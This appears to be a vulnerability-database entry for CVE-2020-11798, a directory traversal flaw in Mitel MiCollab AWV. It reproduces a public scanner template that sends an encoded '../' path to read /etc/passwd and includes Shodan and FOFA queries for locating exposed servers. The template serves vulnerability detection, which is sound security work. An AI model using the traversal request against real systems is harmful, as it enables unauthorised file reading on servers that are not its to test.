CVE-2020-11798: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal

日期: 2025-08-01 | 影响软件: Mitel MiCollab AWV | POC: 已公开

漏洞描述

A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.

PoC代码[已公开]

id: CVE-2020-11798

info:
  name: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
  author: ritikchaddha
  severity: medium
  description: |
    A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.
  impact: |
    An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access.
  reference:
    - https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11798
    - http://packetstormsecurity.com/files/171751/Mitel-MiCollab-AWV-8.1.2.4-9.1.3-Directory-Traversal-LFI.html
    - https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin-20-0005-01.pdf
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-11798
    cwe-id: CWE-22
    epss-score: 0.85152
    epss-percentile: 0.99309
    cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: micollab_audio\,_web_\&_video_conferencing
    shodan-query:
      - html:"Mitel" html:"MiCollab"
      - http.html:"mitel" html:"micollab"
    fofa-query: body="mitel" html:"micollab"
  tags: cve,cve2020,packetstorm,mitel,micollab,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - application/x-download
          - filename=passwd
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022079e9e120525b3237564dfad6fd8470883bab948739fdd53b6f2d590d910a1b78022100a9d2549755ed001e887846e43999fb09dc07d3a89ac40db712e25903ff7871fc:922c64590222798bb761d5b6d8e72950